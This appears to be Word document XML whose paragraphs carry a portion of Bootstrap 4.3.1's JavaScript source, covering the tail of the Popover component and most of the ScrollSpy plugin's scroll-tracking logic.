    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return this.getTitle() || this._getContent();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_proto.addAttachmentClass = function addAttachmentClass(attachment) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this.getTipElement()).addClass(CLASS_PREFIX$1 + "-" + attachment);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_proto.getTipElement = function getTipElement() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.tip = this.tip || $(this.config.template)[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return this.tip;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    _proto.setContent = function setContent() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var $tip = $(this.getTipElement()); // We use append for html objects to maintain js events</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.setElementContent($tip.find(Selector$7.TITLE), this.getTitle());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var content = this._getContent();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (typeof content === 'function') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        content = content.call(this.element);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this.setElementContent($tip.find(Selector$7.CONTENT), content);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $tip.removeClass(ClassName$7.FADE + " " + ClassName$7.SHOW);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_proto._getContent = function _getContent() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return this.element.getAttribute('data-content') || this.config.content;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_proto._cleanTipClass = function _cleanTipClass() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var $tip = $(this.getTipElement());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var tabClass = $tip.attr('class').match(BSCLS_PREFIX_REGEX$1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (tabClass !== null &amp;&amp; tabClass.length &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $tip.removeClass(tabClass.join(''));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Popover._jQueryInterface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$(this).data(DATA_KEY$7);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var _config = typeof config === 'object' ? config : null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (!data &amp;&amp; /dispose|hide/.test(config)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return;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Popover(this, _config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(this).data(DATA_KEY$7,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lastRenderedPageBreak/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_createClass(Popover,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// Getters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VERSION$7;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Default$5;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"NAME",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NAME$7;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"DATA_KEY",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DATA_KEY$7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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"Event",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Event$7;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"EVENT_KEY",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EVENT_KEY$7;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"DefaultType",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DefaultType$5;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Popover;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  }(Tooltip);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$.fn[NAME$7] = Popover._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$7].Constructor = Popover;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$7].noConflict = function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn[NAME$7] = JQUERY_NO_CONFLICT$7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Popover._jQueryInterface;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NAME$8 = 'scrollspy';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var VERSION$8 = '4.3.1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_KEY$8 = 'bs.scrollspy';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var EVENT_KEY$8 = "." + DATA_KEY$8;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_API_KEY$6 = '.data-api';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var JQUERY_NO_CONFLICT$8 = $.fn[NAME$8];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var Default$6 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    offset: 10,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    method: 'auto',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    target: ''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DefaultType$6 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    offset: 'number',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    method: 'string',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    target: '(string|element)'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Event$8 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ACTIVATE: "activate" + EVENT_KEY$8,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SCROLL: "scroll" + EVENT_KEY$8,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    LOAD_DATA_API: "load" + EVENT_KEY$8 + DATA_API_KEY$6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ClassName$8 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DROPDOWN_ITEM: 'dropdown-item',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DROPDOWN_MENU: 'dropdown-menu',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ACTIVE: 'active'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Selector$8 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DATA_SPY: '[data-spy="scroll"]',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ACTIVE: '.active',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    NAV_LIST_GROUP: '.nav, .list-group',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    NAV_LINKS: '.nav-link',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    NAV_ITEMS: '.nav-item',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    LIST_ITEMS: '.list-group-item',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DROPDOWN: '.dropdown',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    DROPDOWN_ITEMS: '.dropdown-item',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DROPDOWN_TOGGLE: '.dropdown-toggle'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OffsetMethod = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    OFFSET: 'offset',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    POSITION: 'position'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ScrollSpy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ScrollSpy(element, config)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  this._scrollElement = element.tagName === 'BODY' ? window : element;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._config = this._getConfig(config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._selector = this._config.target + " " + Selector$8.NAV_LINKS + "," + (this._config.target + " " + Selector$8.LIST_ITEMS + ",") + (this._config.target + " " + Selector$8.DROPDOWN_ITEMS);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._offsets = [];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      this._targets = [];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._activeTarget = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._scrollHeight = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._scrollElement).on(Event$8.SCROLL, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return _this._process(event);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this.refresh();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._process();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ScrollSpy.prototype;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_proto.refresh = function refresh()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var autoMethod = this._scrollElement === this._scrollElement.window ? OffsetMethod.OFFSET : OffsetMethod.POSITION;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var offsetMethod = this._config.method === 'auto' ? autoMethod : this._config.method;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var offsetBase = offsetMethod === OffsetMethod.POSITION ? this._getScrollTop() : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._offsets = [];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._targets = [];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._scrollHeight = this._getScrollHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var targets = [].slice.call(document.querySelectorAll(this._selector));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      targets.map(function (element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var target;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var targetSelector = Util.getSelectorFromElement(element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (targetSelector) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          target = document.querySelector(targetSelector);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(target) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var targetBCR = target.getBoundingClientRect();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (targetBCR.width || targetBCR.height) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            // TODO (fat): remove sketch reliance on jQuery position/offset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            return [$(target)[offsetMethod]().top + offsetBase, targetSelector];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          }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return null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      }).filter(function (item) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return item;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      }).sort(function (a, b) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return a[0] - b[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      }).forEach(function (item) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _this2._offsets.push(item[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        _this2._targets.push(item[1]);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$.removeData(this._element, DATA_KEY$8);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._scrollElement).off(EVENT_KEY$8);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  this._scrollElement = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._config = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._selector = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._offsets = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._targets = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._activeTarget = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._scrollHeight = null;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_proto._getConfig = function _getConfig(config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      config = _objectSpread({}, Default$6, typeof config === 'object' &amp;&amp; config ? config : {});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (typeof config.target !== 'string') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var id = $(config.target).attr('id');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (!id) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          id = Util.getUID(NAME$8);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(config.target).attr('id', id);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config.target = "#" + id;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Util.typeCheckConfig(NAME$8, config, DefaultType$6);</w:t>
      </w:r>
    </w:p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_proto._getScrollTop = function _getScrollTop() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return this._scrollElement === window ? this._scrollElement.pageYOffset : this._scrollElement.scrollTop;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_proto._getScrollHeight = function _getScrollHeight() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return this._scrollElement.scrollHeight || Math.max(document.body.scrollHeight, document.documentElement.scrollHeight);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_proto._getOffsetHeight = function _getOffsetHeight() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return this._scrollElement === window ? window.innerHeight : this._scrollElement.getBoundingClientRect().height;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_proto._process = function _process() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      var scrollTop = this._getScrollTop() + this._config.offset;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var scrollHeight = this._getScrollHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var maxScroll = this._config.offset + scrollHeight - this._getOffsetHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._scrollHeight !== scrollHeight) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.refresh();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(scrollTop &gt;= maxScroll) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var target = this._targets[this._targets.length - 1];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (this._activeTarget !== target) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this._activate(target);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(this._activeTarget &amp;&amp; scrollTop &lt; this._offsets[0] &amp;&amp; this._offsets[0] &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._activeTarget = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._clear();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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offsetLength = this._offsets.length;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      for (var i = offsetLength; i--;) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r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:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (isActiveTarget) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this._activate(this._targets[i]);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_proto._activate = function _activate(target) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._activeTarget = target;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._clear();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var queries = this._selector.split(',').map(function (selector) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return selector + "[data-target=\"" + target + "\"]," + selector + "[href=\"" + target + "\"]";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var $link = $([].slice.call(document.querySelectorAll(queries.join(','))));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
